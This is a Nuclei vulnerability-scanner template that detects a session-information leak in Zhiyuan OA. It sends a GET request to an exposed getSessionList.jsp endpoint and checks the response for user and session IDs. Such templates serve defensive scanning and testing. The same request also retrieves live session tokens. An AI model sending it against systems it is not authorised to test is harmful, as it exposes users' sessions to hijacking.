nuclei-templates/vulnerabilities/other/zhiyuan-oa-session-leak.yaml

27 lines
496 B
YAML
Raw Normal View History

2021-02-24 08:06:28 +00:00
id: zhiyuan-oa-session-leak
info:
name: Zhiyuan Oa Session Leak
author: pikpikcu
severity: medium
reference: https://www.zhihuifly.com/t/topic/3345
tags: zhiyuan,leak,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/yyoa/ext/https/getSessionList.jsp?cmd=getAll"
matchers-condition: and
matchers:
- type: word
words:
- "<usrID>"
- "<sessionID>"
condition: and
- type: status
status:
- 200